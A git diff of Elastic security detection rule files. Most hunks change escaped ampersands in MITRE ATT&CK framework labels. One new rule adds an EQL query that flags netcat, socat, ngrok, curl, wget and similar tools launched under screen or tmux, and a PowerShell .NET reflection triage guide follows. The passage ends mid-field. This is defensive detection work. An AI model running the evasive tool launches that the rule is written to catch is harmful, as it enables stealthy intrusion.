"MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/e0881d20-54ac-457f-8733-fe0bc5d44c55_4.json b/packages/security_detection_engine/kibana/security_rule/e0881d20-54ac-457f-8733-fe0bc5d44c55_4.json index 703632bfc8f..68e50aaa19c 100644 --- a/packages/security_detection_engine/kibana/security_rule/e0881d20-54ac-457f-8733-fe0bc5d44c55_4.json +++ b/packages/security_detection_engine/kibana/security_rule/e0881d20-54ac-457f-8733-fe0bc5d44c55_4.json @@ -80,7 +80,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/e0881d20-54ac-457f-8733-fe0bc5d44c55_5.json b/packages/security_detection_engine/kibana/security_rule/e0881d20-54ac-457f-8733-fe0bc5d44c55_5.json index 0eda12965cd..a1578fe4d3b 100644 --- a/packages/security_detection_engine/kibana/security_rule/e0881d20-54ac-457f-8733-fe0bc5d44c55_5.json +++ b/packages/security_detection_engine/kibana/security_rule/e0881d20-54ac-457f-8733-fe0bc5d44c55_5.json @@ -82,7 +82,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/e08ccd49-0380-4b2b-8d71-8000377d6e49_102.json b/packages/security_detection_engine/kibana/security_rule/e08ccd49-0380-4b2b-8d71-8000377d6e49_102.json index 9867b290137..84e071bcd94 100644 --- a/packages/security_detection_engine/kibana/security_rule/e08ccd49-0380-4b2b-8d71-8000377d6e49_102.json +++ b/packages/security_detection_engine/kibana/security_rule/e08ccd49-0380-4b2b-8d71-8000377d6e49_102.json @@ -53,7 +53,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/e08ccd49-0380-4b2b-8d71-8000377d6e49_103.json b/packages/security_detection_engine/kibana/security_rule/e08ccd49-0380-4b2b-8d71-8000377d6e49_103.json index 0b257b2d6df..89077ae681b 100644 --- a/packages/security_detection_engine/kibana/security_rule/e08ccd49-0380-4b2b-8d71-8000377d6e49_103.json +++ b/packages/security_detection_engine/kibana/security_rule/e08ccd49-0380-4b2b-8d71-8000377d6e49_103.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/e08ccd49-0380-4b2b-8d71-8000377d6e49_104.json b/packages/security_detection_engine/kibana/security_rule/e08ccd49-0380-4b2b-8d71-8000377d6e49_104.json index 74aa6595001..fab8c5388d4 100644 --- a/packages/security_detection_engine/kibana/security_rule/e08ccd49-0380-4b2b-8d71-8000377d6e49_104.json +++ b/packages/security_detection_engine/kibana/security_rule/e08ccd49-0380-4b2b-8d71-8000377d6e49_104.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/e08ccd49-0380-4b2b-8d71-8000377d6e49_105.json b/packages/security_detection_engine/kibana/security_rule/e08ccd49-0380-4b2b-8d71-8000377d6e49_105.json index b371fd3fde8..361e1a4f19b 100644 --- a/packages/security_detection_engine/kibana/security_rule/e08ccd49-0380-4b2b-8d71-8000377d6e49_105.json +++ b/packages/security_detection_engine/kibana/security_rule/e08ccd49-0380-4b2b-8d71-8000377d6e49_105.json @@ -50,7 +50,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/e08ccd49-0380-4b2b-8d71-8000377d6e49_106.json b/packages/security_detection_engine/kibana/security_rule/e08ccd49-0380-4b2b-8d71-8000377d6e49_106.json index 53c0a032828..6f0624b34ab 100644 --- a/packages/security_detection_engine/kibana/security_rule/e08ccd49-0380-4b2b-8d71-8000377d6e49_106.json +++ b/packages/security_detection_engine/kibana/security_rule/e08ccd49-0380-4b2b-8d71-8000377d6e49_106.json @@ -50,7 +50,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/e08ccd49-0380-4b2b-8d71-8000377d6e49_207.json b/packages/security_detection_engine/kibana/security_rule/e08ccd49-0380-4b2b-8d71-8000377d6e49_207.json index 138d042416c..7e4c13cb391 100644 --- a/packages/security_detection_engine/kibana/security_rule/e08ccd49-0380-4b2b-8d71-8000377d6e49_207.json +++ b/packages/security_detection_engine/kibana/security_rule/e08ccd49-0380-4b2b-8d71-8000377d6e49_207.json @@ -50,7 +50,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/e0cc3807-e108-483c-bf66-5a4fbe0d7e89_1.json b/packages/security_detection_engine/kibana/security_rule/e0cc3807-e108-483c-bf66-5a4fbe0d7e89_1.json index 4c1c6f76f3b..0804ac58524 100644 --- a/packages/security_detection_engine/kibana/security_rule/e0cc3807-e108-483c-bf66-5a4fbe0d7e89_1.json +++ b/packages/security_detection_engine/kibana/security_rule/e0cc3807-e108-483c-bf66-5a4fbe0d7e89_1.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/e0cc3807-e108-483c-bf66-5a4fbe0d7e89_2.json b/packages/security_detection_engine/kibana/security_rule/e0cc3807-e108-483c-bf66-5a4fbe0d7e89_2.json new file mode 100644 index 00000000000..8aace85fa6d --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e0cc3807-e108-483c-bf66-5a4fbe0d7e89_2.json @@ -0,0 +1,83 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "This rule monitors for the execution of suspicious commands via screen and tmux. When launching a command and detaching directly, the commands will be executed in the background via its parent process. Attackers may leverage screen or tmux to execute commands while attempting to evade detection.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potentially Suspicious Process Started via tmux or screen", + "query": "process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and \nprocess.parent.name in (\"screen\", \"tmux\") and process.name : (\n \"nmap\", \"nc\", \"ncat\", \"netcat\", \"socat\", \"nc.openbsd\", \"ngrok\", \"ping\", \"java\", \"python*\", \"php*\", \"perl\", \"ruby\",\n \"lua*\", \"openssl\", \"telnet\", \"awk\", \"wget\", \"curl\", \"id\"\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "e0cc3807-e108-483c-bf66-5a4fbe0d7e89", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 + }, + "id": "e0cc3807-e108-483c-bf66-5a4fbe0d7e89_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e0f36de1-0342-453d-95a9-a068b257b053_101.json b/packages/security_detection_engine/kibana/security_rule/e0f36de1-0342-453d-95a9-a068b257b053_101.json index 8db8e7d5abf..c5ff69cc22d 100644 --- a/packages/security_detection_engine/kibana/security_rule/e0f36de1-0342-453d-95a9-a068b257b053_101.json +++ b/packages/security_detection_engine/kibana/security_rule/e0f36de1-0342-453d-95a9-a068b257b053_101.json @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/e0f36de1-0342-453d-95a9-a068b257b053_102.json b/packages/security_detection_engine/kibana/security_rule/e0f36de1-0342-453d-95a9-a068b257b053_102.json index 8aea88f9653..1dbf10c71b9 100644 --- a/packages/security_detection_engine/kibana/security_rule/e0f36de1-0342-453d-95a9-a068b257b053_102.json +++ b/packages/security_detection_engine/kibana/security_rule/e0f36de1-0342-453d-95a9-a068b257b053_102.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/e12c0318-99b1-44f2-830c-3a38a43207ca_102.json b/packages/security_detection_engine/kibana/security_rule/e12c0318-99b1-44f2-830c-3a38a43207ca_102.json index 0b2f1d62af9..09fc594113e 100644 --- a/packages/security_detection_engine/kibana/security_rule/e12c0318-99b1-44f2-830c-3a38a43207ca_102.json +++ b/packages/security_detection_engine/kibana/security_rule/e12c0318-99b1-44f2-830c-3a38a43207ca_102.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/e12c0318-99b1-44f2-830c-3a38a43207ca_103.json b/packages/security_detection_engine/kibana/security_rule/e12c0318-99b1-44f2-830c-3a38a43207ca_103.json index 0645c7e7254..0f945c7f26a 100644 --- a/packages/security_detection_engine/kibana/security_rule/e12c0318-99b1-44f2-830c-3a38a43207ca_103.json +++ b/packages/security_detection_engine/kibana/security_rule/e12c0318-99b1-44f2-830c-3a38a43207ca_103.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/e12c0318-99b1-44f2-830c-3a38a43207ca_104.json b/packages/security_detection_engine/kibana/security_rule/e12c0318-99b1-44f2-830c-3a38a43207ca_104.json index 3e0577ca06a..97c0b93d406 100644 --- a/packages/security_detection_engine/kibana/security_rule/e12c0318-99b1-44f2-830c-3a38a43207ca_104.json +++ b/packages/security_detection_engine/kibana/security_rule/e12c0318-99b1-44f2-830c-3a38a43207ca_104.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/e12c0318-99b1-44f2-830c-3a38a43207ca_205.json b/packages/security_detection_engine/kibana/security_rule/e12c0318-99b1-44f2-830c-3a38a43207ca_205.json index 46e349b6d97..75bb57c181f 100644 --- a/packages/security_detection_engine/kibana/security_rule/e12c0318-99b1-44f2-830c-3a38a43207ca_205.json +++ b/packages/security_detection_engine/kibana/security_rule/e12c0318-99b1-44f2-830c-3a38a43207ca_205.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/e14c5fd7-fdd7-49c2-9e5b-ec49d817bc8d_102.json b/packages/security_detection_engine/kibana/security_rule/e14c5fd7-fdd7-49c2-9e5b-ec49d817bc8d_102.json index 037680e05a9..36012f82de2 100644 --- a/packages/security_detection_engine/kibana/security_rule/e14c5fd7-fdd7-49c2-9e5b-ec49d817bc8d_102.json +++ b/packages/security_detection_engine/kibana/security_rule/e14c5fd7-fdd7-49c2-9e5b-ec49d817bc8d_102.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -83,7 +83,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/e14c5fd7-fdd7-49c2-9e5b-ec49d817bc8d_103.json b/packages/security_detection_engine/kibana/security_rule/e14c5fd7-fdd7-49c2-9e5b-ec49d817bc8d_103.json index 4677dc2a8d9..0f7690e87a9 100644 --- a/packages/security_detection_engine/kibana/security_rule/e14c5fd7-fdd7-49c2-9e5b-ec49d817bc8d_103.json +++ b/packages/security_detection_engine/kibana/security_rule/e14c5fd7-fdd7-49c2-9e5b-ec49d817bc8d_103.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -81,7 +81,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/e14c5fd7-fdd7-49c2-9e5b-ec49d817bc8d_104.json b/packages/security_detection_engine/kibana/security_rule/e14c5fd7-fdd7-49c2-9e5b-ec49d817bc8d_104.json index 3923a6e1289..1e9b5da8abd 100644 --- a/packages/security_detection_engine/kibana/security_rule/e14c5fd7-fdd7-49c2-9e5b-ec49d817bc8d_104.json +++ b/packages/security_detection_engine/kibana/security_rule/e14c5fd7-fdd7-49c2-9e5b-ec49d817bc8d_104.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -81,7 +81,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/e14c5fd7-fdd7-49c2-9e5b-ec49d817bc8d_205.json b/packages/security_detection_engine/kibana/security_rule/e14c5fd7-fdd7-49c2-9e5b-ec49d817bc8d_205.json index c583df4217b..9bf45ecd2b9 100644 --- a/packages/security_detection_engine/kibana/security_rule/e14c5fd7-fdd7-49c2-9e5b-ec49d817bc8d_205.json +++ b/packages/security_detection_engine/kibana/security_rule/e14c5fd7-fdd7-49c2-9e5b-ec49d817bc8d_205.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -81,7 +81,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/e19e64ee-130e-4c07-961f-8a339f0b8362_102.json b/packages/security_detection_engine/kibana/security_rule/e19e64ee-130e-4c07-961f-8a339f0b8362_102.json index 65e36d412af..ce3493e2643 100644 --- a/packages/security_detection_engine/kibana/security_rule/e19e64ee-130e-4c07-961f-8a339f0b8362_102.json +++ b/packages/security_detection_engine/kibana/security_rule/e19e64ee-130e-4c07-961f-8a339f0b8362_102.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/e19e64ee-130e-4c07-961f-8a339f0b8362_103.json b/packages/security_detection_engine/kibana/security_rule/e19e64ee-130e-4c07-961f-8a339f0b8362_103.json index d9affb8c038..9511371c004 100644 --- a/packages/security_detection_engine/kibana/security_rule/e19e64ee-130e-4c07-961f-8a339f0b8362_103.json +++ b/packages/security_detection_engine/kibana/security_rule/e19e64ee-130e-4c07-961f-8a339f0b8362_103.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/e19e64ee-130e-4c07-961f-8a339f0b8362_104.json b/packages/security_detection_engine/kibana/security_rule/e19e64ee-130e-4c07-961f-8a339f0b8362_104.json index 36d983d93af..fc305860642 100644 --- a/packages/security_detection_engine/kibana/security_rule/e19e64ee-130e-4c07-961f-8a339f0b8362_104.json +++ b/packages/security_detection_engine/kibana/security_rule/e19e64ee-130e-4c07-961f-8a339f0b8362_104.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/e19e64ee-130e-4c07-961f-8a339f0b8362_105.json b/packages/security_detection_engine/kibana/security_rule/e19e64ee-130e-4c07-961f-8a339f0b8362_105.json index 148b97a22d4..831b5afd7dc 100644 --- a/packages/security_detection_engine/kibana/security_rule/e19e64ee-130e-4c07-961f-8a339f0b8362_105.json +++ b/packages/security_detection_engine/kibana/security_rule/e19e64ee-130e-4c07-961f-8a339f0b8362_105.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/e19e64ee-130e-4c07-961f-8a339f0b8362_106.json b/packages/security_detection_engine/kibana/security_rule/e19e64ee-130e-4c07-961f-8a339f0b8362_106.json index d9c07831ef0..c748a93b0c3 100644 --- a/packages/security_detection_engine/kibana/security_rule/e19e64ee-130e-4c07-961f-8a339f0b8362_106.json +++ b/packages/security_detection_engine/kibana/security_rule/e19e64ee-130e-4c07-961f-8a339f0b8362_106.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/e1db8899-97c1-4851-8993-3a3265353601_1.json b/packages/security_detection_engine/kibana/security_rule/e1db8899-97c1-4851-8993-3a3265353601_1.json index 88558465f5a..462783f1857 100644 --- a/packages/security_detection_engine/kibana/security_rule/e1db8899-97c1-4851-8993-3a3265353601_1.json +++ b/packages/security_detection_engine/kibana/security_rule/e1db8899-97c1-4851-8993-3a3265353601_1.json @@ -33,7 +33,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0010", "name": "Exfiltration", diff --git a/packages/security_detection_engine/kibana/security_rule/e2258f48-ba75-4248-951b-7c885edf18c2_1.json b/packages/security_detection_engine/kibana/security_rule/e2258f48-ba75-4248-951b-7c885edf18c2_1.json index f8ef7cab1e4..9ba3c13cd75 100644 --- a/packages/security_detection_engine/kibana/security_rule/e2258f48-ba75-4248-951b-7c885edf18c2_1.json +++ b/packages/security_detection_engine/kibana/security_rule/e2258f48-ba75-4248-951b-7c885edf18c2_1.json @@ -54,7 +54,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/e2258f48-ba75-4248-951b-7c885edf18c2_2.json b/packages/security_detection_engine/kibana/security_rule/e2258f48-ba75-4248-951b-7c885edf18c2_2.json index 8b1b95bfd05..7eb8174f34f 100644 --- a/packages/security_detection_engine/kibana/security_rule/e2258f48-ba75-4248-951b-7c885edf18c2_2.json +++ b/packages/security_detection_engine/kibana/security_rule/e2258f48-ba75-4248-951b-7c885edf18c2_2.json @@ -53,7 +53,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/e2258f48-ba75-4248-951b-7c885edf18c2_3.json b/packages/security_detection_engine/kibana/security_rule/e2258f48-ba75-4248-951b-7c885edf18c2_3.json index 7e0f1f4760e..fa72ffd1afb 100644 --- a/packages/security_detection_engine/kibana/security_rule/e2258f48-ba75-4248-951b-7c885edf18c2_3.json +++ b/packages/security_detection_engine/kibana/security_rule/e2258f48-ba75-4248-951b-7c885edf18c2_3.json @@ -54,7 +54,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/e2258f48-ba75-4248-951b-7c885edf18c2_4.json b/packages/security_detection_engine/kibana/security_rule/e2258f48-ba75-4248-951b-7c885edf18c2_4.json index 2f4109296dc..4f54926dbba 100644 --- a/packages/security_detection_engine/kibana/security_rule/e2258f48-ba75-4248-951b-7c885edf18c2_4.json +++ b/packages/security_detection_engine/kibana/security_rule/e2258f48-ba75-4248-951b-7c885edf18c2_4.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/e2258f48-ba75-4248-951b-7c885edf18c2_5.json b/packages/security_detection_engine/kibana/security_rule/e2258f48-ba75-4248-951b-7c885edf18c2_5.json index ef7ac506396..2396228d3cf 100644 --- a/packages/security_detection_engine/kibana/security_rule/e2258f48-ba75-4248-951b-7c885edf18c2_5.json +++ b/packages/security_detection_engine/kibana/security_rule/e2258f48-ba75-4248-951b-7c885edf18c2_5.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/e26aed74-c816-40d3-a810-48d6fbd8b2fd_102.json b/packages/security_detection_engine/kibana/security_rule/e26aed74-c816-40d3-a810-48d6fbd8b2fd_102.json index ef71985128c..745e18d6410 100644 --- a/packages/security_detection_engine/kibana/security_rule/e26aed74-c816-40d3-a810-48d6fbd8b2fd_102.json +++ b/packages/security_detection_engine/kibana/security_rule/e26aed74-c816-40d3-a810-48d6fbd8b2fd_102.json @@ -31,7 +31,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -46,7 +46,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/e26aed74-c816-40d3-a810-48d6fbd8b2fd_103.json b/packages/security_detection_engine/kibana/security_rule/e26aed74-c816-40d3-a810-48d6fbd8b2fd_103.json index dcaeebdb01e..816ed4a67f3 100644 --- a/packages/security_detection_engine/kibana/security_rule/e26aed74-c816-40d3-a810-48d6fbd8b2fd_103.json +++ b/packages/security_detection_engine/kibana/security_rule/e26aed74-c816-40d3-a810-48d6fbd8b2fd_103.json @@ -31,7 +31,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -46,7 +46,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/e26aed74-c816-40d3-a810-48d6fbd8b2fd_104.json b/packages/security_detection_engine/kibana/security_rule/e26aed74-c816-40d3-a810-48d6fbd8b2fd_104.json index ebc6d76a032..95d541d2b72 100644 --- a/packages/security_detection_engine/kibana/security_rule/e26aed74-c816-40d3-a810-48d6fbd8b2fd_104.json +++ b/packages/security_detection_engine/kibana/security_rule/e26aed74-c816-40d3-a810-48d6fbd8b2fd_104.json @@ -45,7 +45,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -60,7 +60,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/e26f042e-c590-4e82-8e05-41e81bd822ad_105.json b/packages/security_detection_engine/kibana/security_rule/e26f042e-c590-4e82-8e05-41e81bd822ad_105.json index 06e8e9765ff..8f029e1c428 100644 --- a/packages/security_detection_engine/kibana/security_rule/e26f042e-c590-4e82-8e05-41e81bd822ad_105.json +++ b/packages/security_detection_engine/kibana/security_rule/e26f042e-c590-4e82-8e05-41e81bd822ad_105.json @@ -12,7 +12,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Suspicious .NET Reflection via PowerShell", - "note": "## Triage and analysis\n\n### Investigating Suspicious .NET Reflection via PowerShell\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can use .NET reflection to load PEs and DLLs in memory. These payloads are commonly embedded in the script, which can circumvent file-based security protections.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately outside engineering or IT business units. As long as the analyst did not identify malware or suspicious activity related to the user or host, this alert can be dismissed.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Suspicious .NET Reflection via PowerShell\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can use .NET reflection to load PEs and DLLs in memory. These payloads are commonly embedded in the script, which can circumvent file-based security protections.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for 